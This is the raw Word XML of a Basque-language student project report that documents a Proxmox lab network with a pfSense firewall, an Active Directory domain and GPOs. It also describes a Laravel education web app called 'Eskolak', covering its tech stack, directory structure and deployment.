        <w:t xml:space="preserve"> WAN IP publiko/kanpokoagatik ordezkatzen da (WAN address). Horri esker, barneko gailu guztiek Interneteko konexio segurua dute. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D"/>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="285"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. SISTEMAK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="240" w:after="240" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Documentazio honetan Proxmox azpiegituran inplementatutako zerbitzarien, Active Directory domeinuaren, DNS zerbitzuaren eta GPO directiben konfigurazioa azaltzen da.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="21717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3B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>100 (pfsense):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suebaki nagusia. VLAN ezberdinen arteko bideratzea, NAT eta segurtasun-ar</w:t>
      </w:r>
      <w:r>
        <w:t>auak kudeatzen ditu.</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">101 (VM 101 - Windows Server): </w:t>
      </w:r>
      <w:r>
        <w:t>Windows Server 2019/2022 zerbitzaria. Active Directory Domeinu Kontrolatzaile (talde3.lan) eta DNS zerbitzari nagusi gisa funtzionatzen du (192.168.40.10).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>102 (bezero):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows 10 Pro Bezero-makina (19</w:t>
      </w:r>
      <w:r>
        <w:t>2.168.30.100), talde3.lan domeinura atxikitako bezeroa (ERABILTZAILEAK VLAN 30).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>103 (ubuntu-mysql):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ubuntu Server datu-base zerbitzaria (192.168.20.10), ZERBITZARIAK VLAN 20 eremuan.</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>104 (ubuntu-web):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ubuntu Server Web zerbitzaria (192.168.10.10), DMZ V</w:t>
      </w:r>
      <w:r>
        <w:t>LAN 10 eremuan isolatuta.</w:t>
      </w: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Windows Server (VM 101)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Domeinua sortuta 192.168.40.10 sarean VLAN 40-arekin Domeinu izena: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>talde3.lan</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4329113" cy="1747466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17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3B1660">
      <w:pPr>
        <w:widowControl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BALIABIDE PARTEKATUAK ETA GPO DIRECTIBEN KUDEAKETA </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Karpeta partekatu bat sortu dugu windows zerbitzarian eta partekatu egin dugu unidad organizatiba batera “erabiltzaileak” deituta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tokiko bidea: C:\partekatuta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="3023071" cy="4037524"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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3071" cy="4037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E0233D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pP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</w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="17018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3B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Active Directory-n Erabiltzaileak izeneko Antolaketa Unitatea (OU) sortu da (bertan Adrian</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> erabiltzailea kokatuz). OU honi GPOfondoa izeneko talde-directiba bat elkartu zaio </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2032000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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3B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Eta konfiguratu egin genuen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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3B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>W10 Pro-ari “bezero” izena jarri diogu eta domeinura sartuko dugu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP helbidea</w:t>
      </w:r>
      <w:r>
        <w:t>: 192.168.30.100</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azpisare-maskara</w:t>
      </w:r>
      <w:r>
        <w:t>: 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Atebide nagusia</w:t>
      </w:r>
      <w:r>
        <w:t>: 192.168.30.254 (pfSense VLAN 30 interfazea)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS Zerbitzari Nagusia</w:t>
      </w:r>
      <w:r>
        <w:t>: 192.168.40.10 (Windows Server)</w:t>
      </w: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</w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2843213" cy="3224203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3224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3B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hemen ikusten da nola bezeroa domeinuan sartuta dagoela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="2959100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E0233D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="39370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5731200" cy="4025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3B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Eta hemen GPO funtzionamenduan ikuskiko dugu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="313690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3B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="42545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233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D"/>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="285"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Proiektuaren aurkezpe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>na eta helburuak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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Eskolak hezkuntza-ingurune baterako sortutako web aplikazioa da. Plataformaren helburua ikasle, irakasle eta administratzaileek ikastaroak, klaseak, erabiltzaileak, matrikulazioak eta material didaktikoak modu zentralizatuan kudeatzea da.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aplikazioak rol bakoitzari dagokion lan-eremua eskaintzen dio, eta baimenak zerbitzariaren aldean kontrolatzen dira.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1.1. Helburu nagusiak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Ikasleei beren klaseari dagokion ikastaro-katalogoa eskaintzea eta ikastaroetan izena emateko aukera ematea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Irakasleei esleitutako ikastaroak, ikasleak eta material didaktikoak kudeatzeko gune propioa ematea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Administratzaileei erabiltzaile, rol, klase eta ikastaroen kudeaketa zentralizatua eskaintzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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 xml:space="preserve">Erregistro segurua eskaintzea posta elektronikoz bidalitako </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>egiaztapen-kode baten bidez.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Gaztelania, euskara eta ingelesa onartzea, interfazea erabiltzailearen hizkuntza-hautaketara egokituz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Datuen osotasuna eta sarbide-kontrola Laravel-en balidazio, Gate, middleware eta datu-baseko murrizketen bidez bermatzea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2. Aplikazioaren fitxa teknikoa</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a0"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0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0233D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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Elementua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Egungo konfigurazioa</w:t>
            </w:r>
          </w:p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Aplikazioaren izena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Eskolak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Backend Framework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Laravel 13.17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PHP Bertsioa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PHP ^8.3 (CI ingurunean PHP 8.4)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Datu-basea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MySQL, 127.0.0.1:3306, Talde3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Blade + Tailwind CSS 4 + Vite 8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Autentifikazioa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Laravel Auth + Google OAuth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Saioak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Datu-basean gordetzen dira (database driver)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Hizkuntzak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eu / es / en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Posta zerbitzua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SMTP (Gmail host-a konfigurazioan)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Bertsio-kontrola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 + GitHub Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="450"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="360"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. Erabilitako teknologiak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pict>
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.1. Backend-a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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Backend-a PHP eta Laravel framework-arekin dago garatuta. Laravel-ek MVC eredua erabiltzen du: Models datu-baseko entitateak ordezkatzen dituzte, Controllers-ek aplikazioaren logika kudeatzen dute eta Blade Views-ek erabiltzaileari HTML interfazea erakuste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>n diote.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a1"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0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0233D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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Teknologia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Erabilera</w:t>
            </w:r>
          </w:p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PHP 8.3+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Zerbitzariaren aldeko programazio-lengoaia nagusia.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Laravel 13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MVC egitura, routing-a, autentifikazioa, balidazioa, ORM-a eta segurtasun-mekanismoak.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Eloquent ORM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User, Course, Enrollment, SchoolClass eta CourseMaterial ereduen bidez datu-basearekin lan egiteko.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Blade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HTML bistak osatzeko Laravel-en txantiloi-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>sistema.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MySQL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Aplikazioaren datu iraunkorrak gordetzeko datu-base erlazionala.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Composer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PHP mendekotasunak kudeatzeko pakete-kudeatzailea.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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2.2. Frontend-a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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Interfazearen eraikuntzan Blade txantiloiak, JavaScript, Tailwind CSS 4 eta Vite 8 erabiltzen dira. Frontend-ak tema argia eta iluna kudeatzen ditu, administrazio-panelean fitxen arteko nabigazioa eskaintzen du eta formularioen egoerak kontrolatzen ditu.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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.3. Garapen- eta kalitate-tresnak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Laravel Pint:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP kodearen formatua eta estilo-arauak egiaztatzeko.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Larastan / PHPStan:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analisi estatikoa egiteko (maila: 5).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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PHPUnit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Backend probak eta test unitarioak exekutatzeko.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Node test runner:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Frontend interakzioak eta DOM portaera egiaztatzeko.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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jscpd:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kode bikoiztua detektatzeko (%5eko atalasearekin).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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composer audit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP mendekotasunen segurtasun-ahultasun ezagunak bilatzeko.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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GitHub Actions:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Build-a, kalitate-kontrola eta testak automatikoki e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>xekutatzeko pipeline-a.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="450"/>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="450" w:after="360"/>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3. Arkitektura, egitura eta azpiegitura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pict>
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2B579A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1. Proiektuaren egitura eta direktorioak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color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Proiektuaren erroan GitHub Actions konfigurazioa dago, eta aplikazio nagusia Ikasgune direktorioaren barruan kokatzen da. Laravel-en konbentzioei j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>arraituz antolatzen da.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a2"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0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0233D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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Direktorioa / Fitxategia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Funtzioa</w:t>
            </w:r>
          </w:p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app/Models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Datu-baseko entitateak eta haien arteko erlazioak.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app/Http/Controllers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Eskaeren logika: autentifikazioa, ikastaroak, administrazioa, irakasleak, profila...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app/Http/Requests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Formularioen balidazio-arau espezifikoak.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app/Http/Middleware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Hizkuntza ezartzea eta ikaslearen profil akademikoa osatuta dagoela kontrolatzea.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app/Providers/AppServiceProvider.php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Gate baimenak eta pasahitz-berreskurapeneko posta pertsonalizatzea.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database/migrations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Taulen sorrera, egitura eta eskema-aldaketak.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resources/views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Blade bistak: login, erregistroa, ikastaroak, administrazioa, irakasle-gunea...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routes/web.php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 aplikazioaren endpoint eta middleware definizio guztiak.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.env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Ingurunearen konfigurazio lokala (sekretuak ez dira bertsio-kontrolean idazten).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.github/workflows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CI/CD eta kode-kalitatearen automatizazio-fitxategiak.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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3.2. MVC fluxuaren adibidea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Erabiltzaileak /cursos helbidera HTTP eskaera bat egiten du.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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 xml:space="preserve">routes/web.php fitxategiak </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>CourseController::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>index metodoa exekutatzen du.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Kontrolatzaileak Course eredua erabiltzen du datu-baseko ikastaroak kontsultatzeko eta erabiltzailearen arabera iragazteko.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Kontrolatzaileak courses/index.blade.php bistari datuak b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>idaltzen dizkio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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 xml:space="preserve">Blade txantiloi-sistemak HTML erantzuna sortzen du eta nabigatzaileak erabiltzaileari </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>erakusten dio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="30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3.3. Azpiegitura eta hedapena Proxmox ingurunean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333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Aplikazioaren produkzio-azpiegitura Proxmox ingurune birtualizatuan desmuntatuta dago, zerbitzuen arteko isolamendua eta segurtasuna bermatzeko:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Web Zerbitzaria:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ubuntu Server sistema eragilean host-eatuta dago, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> web zerbitzaria erabiliz aplikazioaren</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> eskaerak kudeatzeko eta zerbitzu gisa exekutatzeko.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B16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Datu-base Zerbitzaria:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL datu-basea node isolatu batean gordetzen da, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
